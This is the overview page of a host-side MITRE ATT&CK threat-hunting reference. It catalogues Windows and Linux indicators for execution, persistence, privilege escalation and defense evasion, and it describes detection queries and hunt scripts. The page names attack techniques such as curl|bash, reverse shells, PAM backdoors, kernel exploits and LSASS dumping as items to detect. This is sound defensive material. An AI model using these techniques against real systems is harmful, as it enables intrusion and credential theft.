NETWORK HOST
MITRE ATT&CK Host Analyst Reference
Host analyst threat hunting: indicators, detection syntax, and APT attribution across the attack lifecycle
Tactics
TA0002
44 indicators · 18 techniques · WIN + LINUX
Execution
Code execution via interpreters and signed binaries. Windows (32): PowerShell, cmd, VBScript, JScript, WMI, scheduled tasks, service execution, mshta, rundll32, regsvr32, Native API, DLL side-loading, user execution. Linux (12): T1059.004 Unix Shell (curl|bash, reverse shells, service-spawned shells, HISTFILE/IFS obfuscation, SUID interpreters), T1059.006 Python (-c reverse shells, pty.spawn, sitecustomize/PYTHONSTARTUP), T1106 fileless and LD_PRELOAD execution (memfd_create, ld.so.preload), T1053.003 Cron (crontab/cron.d/systemd timers), T1059 Perl one-liners, T1059.012 container shells (docker/kubectl/nsenter exec).
▶ Open reference
TA0003
28 indicators · 16 techniques · WIN + LINUX
Persistence
Mechanisms ensuring adversary access survives reboots and logouts. Windows (20): T1547.001 Registry Run Keys / Startup Folder (3), T1546.003 WMI Subscription Persistence Hunt (2), T1543.003 Windows Service Persistence Hunt (3), T1053.005 Scheduled Task Persistence Angle (2), T1547.009 Shortcut Modification (2), T1037 Boot/Logon Init Scripts including GPO logon scripts (2), T1098 Account Manipulation - group changes and password resets (2), T1136 Create Account - local and domain (2), T1546.015 COM Hijacking - HKCU shadow and phantom/TreatAs variants (2). Linux (8): T1053.003 Cron jobs (2), T1543.002 systemd service units (1), T1546.004 Unix shell rc/profile (1), T1098.004 SSH authorized_keys (1), T1547.006 kernel modules / LKM (1), T1556.003 PAM backdoor (1), T1037.004 RC init scripts (1). Cross-cited techniques from Execution are built with persistence-hunting-specific indicators rather than duplicating Execution coverage.
▶ Open reference
TA0004
30 indicators · 16 techniques · WIN + LINUX
Privilege Escalation
Elevating from user to admin/SYSTEM/root. Windows (21): UAC bypass (T1548.002, 3), token manipulation incl. Potato + SID-history (T1134/.005, 3), process injection - remote-thread/hollowing/thread-hijack (T1055, 3), exploitation incl. BYOVD (T1068 win, 2), service registry/path/permission weaknesses (T1574.011/.005, 3), DLL search-order hijack priv-esc angle (T1574.001, 1), accessibility & IFEO triggered execution (T1546.008/.012, 2), GPO & domain-trust modification (T1484.001/.002, 2), container escape (T1611 win, 1), account manipulation / AdminSDHolder (T1098, 1). Linux (9): T1548.001 setuid/setgid + GTFOBins + Linux capabilities (2), T1548.003 sudo misconfig + sudo CVEs incl. Baron Samedit (2), T1068 pkexec PwnKit + kernel exploits DirtyPipe/DirtyCOW/Looney Tunables (2), T1611 privileged container / docker.sock / runc / cgroups escape (2), T1574.006 dynamic linker hijack via LD_PRELOAD/ld.so.preload (1).
▶ Open reference
TA0005
16 indicators · 11 techniques · LINUX
Defense Evasion
Subverting and blinding host defenses and removing evidence of intrusion. Linux coverage complete (16): T1070 Indicator Removal - .003 clear command history, .002 clear system logs plus utmp/wtmp/btmp/lastlog login-record tampering, .006 timestomp, .004 file deletion plus /proc self-delete recovery. T1562 Impair Defenses - .012 disable the Linux audit system, .001 disable security agents plus SELinux/AppArmor plus the Alibaba/Tencent cloud-agent uninstall TTP, .004 disable or flush the host firewall, .006 indicator blocking. T1014 Rootkit - LKM, userland LD_PRELOAD, and eBPF, hunted by discrepancy checks, dynamic-vs-static differential, and bpftool inventory. T1036 Masquerading - .005 fake kernel threads and system-binary name/location impersonation, .004 task/service masquerade. Windows coverage is underway: T1070.001 clear event logs, T1562.001 Defender tampering, plus in-memory AMSI bypass and ETW patching, T1112 modify registry, plus the LOLBin proxy-execution set where signed trusted binaries make signature allow-listing useless and detection lives in command line, parent-child, and egress: T1218.011 rundll32 (DLL exports, the blank-command-line injection host, and comsvcs MiniDump against LSASS), T1218.010 regsvr32 Squiblydoo, T1218.005 mshta, T1218.004 InstallUtil, T1127.001 MSBuild, and T1218.007 msiexec.
▶ Open reference
TA0006
Planned
Credential Access
LSASS access patterns, SAM/NTDS extraction, DPAPI abuse, Mimikatz process indicators. Host-side complement to network credential access detections.
Coming soon
TA0007
Planned
Discovery
Host enumeration commands, registry queries, network/system discovery. Complements network-side discovery detections.
Coming soon
About this reference

What this is

The host-side companion to the network threat hunt reference. Where the network reference covers what adversaries do across the wire, this site covers what they do inside the endpoint: process execution, persistence, privilege escalation, host-side credential theft.

Covers both Windows and Linux endpoints. Each indicator is tagged WIN or LINUX; use the OS filter in any tactic header to narrow to one platform, or leave it off to see both. Windows rows lead with Sysmon / PowerShell / registry; Linux rows lead with Sysmon for Linux / auditd / shell, with file artifacts in place of registry.

Each indicator includes detection telemetry, paste-ready Kibana KQL, hunt scripts, file/registry artifacts, adversary tool attribution, and references to open-source detection projects (Sigma, Velociraptor, Hayabusa, Falco, etc.).

How to use it

  • Pick a tactic card to open its reference page
  • Search or filter to narrow indicators by technique or APT actor
  • Each row has tabs for Sysmon · Kibana · PowerShell · Registry/Artifacts · Tools · OSS Detections · Notes · APT
  • Click the ★ star to add to your hunt list (persisted across sessions)
  • Open My Hunts to review and export your hunt as TXT or CSV. A per-technique case template is also available on each row for structured note-taking.
Use the NETWORK / HOST switcher in the header to jump to the network reference for the complementary lens on the same techniques.

Schema notes

The host schema differs from network because host telemetry has more dimensions. Same indicator can have evidence in: process events (Sysmon EID 1), registry modifications (EID 12/13), file creation (EID 11), network connections from process (EID 3), image loads (EID 7), and process access (EID 10).

PowerShell hunt scripts are designed to run directly against Windows event logs - useful for both proactive hunting and during incident response when you need to triage without a SIEM.

Current Build Status

Execution (TA0002), Persistence (TA0003), and Privilege Escalation (TA0004) complete.

Defense Evasion (TA0005) in progress: 10 indicators across 8 sub-techniques, Linux-focused build first.

Upcoming tactic build order:
→Execution
→Persistence
→Privilege Escalation
→Defense Evasion
→Credential Access
→Discovery
then completionist coverage of the rest.